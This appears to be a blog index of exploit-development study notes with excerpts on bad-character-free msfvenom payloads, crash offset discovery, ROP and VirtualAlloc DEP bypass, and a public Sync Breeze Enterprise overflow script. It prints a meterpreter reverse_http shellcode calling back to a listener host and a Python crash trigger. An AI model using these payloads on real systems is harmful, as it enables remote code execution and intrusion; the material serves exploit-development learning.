Problem

The problem is that we generated a shellcode with msfvenom that avoid several badchars:

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.119.120 LPORT=8080 -b "\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with Encoding failed due to a bad character (index=667, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 714 (iteration=0)
x86/call4_dword_xor chosen with final size 714
Payload size: 714 bytes
Final size of python file: 3978 bytes
shellcode =  b""
shellcode += b"\x33\xc9\x66\x81\xe9\x54\xff\xe8\xff\xff\xff"
shellcode += b"\xff\xc0\x5e\x81\x76\x0e\xa4\x94\xf7\xb3\x83"
shellcode += b"\xee\xfc\xe2\xf4\x58\x7c\x78\xb3\xa4\x94\x97"
shellcode += b"\x82\x76\x1d\x12\xd7\x2f\xc6\xc7\x38\xf6\x98"
shellcode += b"\x7c\xe1\xb0\x9b\x40\xf9\x82\x1f\x85\x9b\x95"
shellcode += b"\x6b\xc6\x73\x08\xa8\x96\xcf\xa6\xb8\xd7\x72"
shellcode += b"\x6b\x99\xf6\x74\xed\xe1\x18\xe1\xf3\x1f\xa5"
shellcode += b"\xa3\x2f\xd6\xcb\xb2\x74\x1f\xb7\xcb\x21\x54"

This shellcode has several instructions that try to “decode” its own code in order to replace some bytes for other bytes (let’s say it’s trying to restore itself). For that, it needs to write in the address where it is stored, giving us an error when the codecave does not have write permissions, which is the case:

Continue reading 

Locating the crash

Generate the pattern with KALI or online. Put the pattern as payload and detect the offset of the crash. Once the offset is located, fill with As.

msf-pattern_create -l 2600

When crashing, EIP will have a certain value. Copy the value to obtain the exact offset: msf-pattern_offset -l 2600 -q “TBD_EIP”

Continue reading 

ROP Lore

Why is ROP needed

The classic buffer overflows manage to execute arbitrary code by redirecting the execution flow to something in the stack (that is normally also user-controlled). However, the normal program flow does not need to redirect the execution flow of the stack as the code that is being executed is normally in the .text section of the binary. The stack is used to store and manage local variables and parameters to functions.

Continue reading 

VirtualAlloc ROP

Let’s see how we can use VirtualAlloc to bypass DEP. VirtualAlloc is a Windows API function that can reserve, commit, or change the state of a region of pages in the virtual address space of the calling process. We are going to invoke VirtualAlloc by placing a skeleton of the function call on the stack through the buffer overflow, modifying its address and parameters through ROP, and then return into it. The skeleton should contain the VirtualAlloc address followed by the return address (which should be our shellcode) and the arguments for the function call. Let’s see the skeleton of VirtualAlloc:

Continue reading 

Analyzing public exploit

• Vulnerable Binary: Sync Breeze Enterprise v10.4.18

Let’s try to use the public exploit to trigger a crash:

#!/usr/bin/python  
import socket  
import sys  
from struct import pack  
try:  
 server = "192.168.122.113"  
 port = 9121  
 size = 1000  
 inputBuffer = b"\x41" * size  
 header = b"\x75\x19\xba\xab"  
 header += b"\x03\x00\x00\x00"  
 header += b"\x00\x40\x00\x00"  
 header += pack('<I', len(inputBuffer))  
 header += pack('<I', len(inputBuffer))  
 header += pack('<I', inputBuffer[-1])  
 buf = header + inputBuffer  
 print("Sending evil buffer...")  
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 s.connect((server, port))  
 s.send(buf)  
 s.close()  
  
 print("Done!")  
except socket.error:  
 print("Could not connect!")

When we execute the exploit, we see that the EAX register is overwritten, but not the EIP… Seems like at this moment the EIP register is not directly under our control. Also, there is some data in the stack that contains part of our payload:

Continue reading 